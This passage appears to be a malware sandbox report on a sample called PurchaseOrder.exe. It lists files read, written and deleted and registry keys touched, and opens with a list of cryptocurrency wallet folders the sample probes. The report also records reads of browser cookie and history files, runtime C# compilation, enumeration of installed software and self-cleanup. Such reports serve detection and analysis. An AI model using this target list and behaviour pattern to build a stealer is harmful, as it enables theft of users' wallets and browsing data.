C:\ProgramData\Fastcoin\*.*
C:\Users\Seven01\AppData\Local\Fastcoin\*.*
C:\Users\Seven01\AppData\Roaming\I0coin\*.*
C:\ProgramData\I0coin\*.*
C:\Users\Seven01\AppData\Local\I0coin\*.*
C:\Users\Seven01\AppData\Roaming\Tagcoin\*.*
C:\ProgramData\Tagcoin\*.*
C:\Users\Seven01\AppData\Local\Tagcoin\*.*
C:\Users\Seven01\AppData\Roaming\Bytecoin\*.*
C:\ProgramData\Bytecoin\*.*
C:\Users\Seven01\AppData\Local\Bytecoin\*.*
C:\Users\Seven01\AppData\Roaming\Florincoin\*.*
C:\ProgramData\Florincoin\*.*
C:\Users\Seven01\AppData\Local\Florincoin\*.*
C:\Users\Seven01\AppData\Roaming\Phoenixcoin\*.*
C:\ProgramData\Phoenixcoin\*.*
C:\Users\Seven01\AppData\Local\Phoenixcoin\*.*
C:\Users\Seven01\AppData\Roaming\Luckycoin\*.*
C:\ProgramData\Luckycoin\*.*
C:\Users\Seven01\AppData\Local\Luckycoin\*.*
C:\Users\Seven01\AppData\Roaming\Craftcoin\*.*
C:\ProgramData\Craftcoin\*.*
C:\Users\Seven01\AppData\Local\Craftcoin\*.*
C:\Users\Seven01\AppData\Roaming\Junkcoin\*.*
C:\ProgramData\Junkcoin\*.*
C:\Users\Seven01\AppData\Local\Junkcoin\*.*
C:\Users\Seven01\AppData\Local\Temp\Client Hash
\??\PIPE\samr
C:\DosDevices\pipe\
C:\Users\Seven01\AppData\Local\Temp\14623046.bat
\??\MountPointManager
C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\AppData\Local\Temp\14623046.bat"
C:\
C:\Windows\Microsoft.NET\Framework\v2.0.50727

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\PurchaseOrder.exe.config
C:\Users\Seven01\AppData\Local\Temp\PurchaseOrder.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol36.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.dll
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSCF76FE7C21302401AB124AE595F9F7E1A.TMP
C:\Users\Seven01\AppData\Local\Temp\RES4E93.tmp
C:\Windows\System32\tzres.dll
C:\Windows\System32\it-IT\tzres.dll.mui
C:\Users\Seven01\AppData\Local\Temp\HWID
C:\Windows\win.ini
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Seven01\AppData\Local\Temp\Client Hash
\??\PIPE\samr
C:\Users\Seven01\AppData\Local\Temp\14623046.bat

Write Files

C:\Users\Seven01\AppData\Local\Temp\hru5mklf.tmp
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.0.cs
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.dll
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.cmdline
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.out
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.err
C:\Users\Seven01\AppData\Roaming\null
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.pdb
C:\Users\Seven01\AppData\Local\Temp\CSCF76FE7C21302401AB124AE595F9F7E1A.TMP
C:\Users\Seven01\AppData\Local\Temp\RES4E93.tmp
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
\??\PIPE\samr
C:\Users\Seven01\AppData\Local\Temp\14623046.bat

Delete Files

C:\Users\Seven01\AppData\Local\Temp\hru5mklf.err
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.pdb
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.dll
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.cmdline
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.out
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.tmp
C:\Users\Seven01\AppData\Local\Temp\hru5mklf.0.cs
C:\Users\Seven01\AppData\Roaming\null:Zone.Identifier
C:\Users\Seven01\AppData\Local\Temp\RES4E93.tmp
C:\Users\Seven01\AppData\Local\Temp\CSCF76FE7C21302401AB124AE595F9F7E1A.TMP
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Users\Seven01\AppData\Local\Temp\14623046.bat

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PurchaseOrder.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index36
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\CMF\Config
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\PurchaseOrder.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\26F47677
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player NPAPI\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Pillow-py2.7\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1045AB6F-6151-3634-8C2C-EE308AA1A6A7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1045AB6F-6151-3634-8C2C-EE308AA1A6A7}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1045AB6F-6151-3634-8C2C-EE308AA1A6A7}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\UninstallString
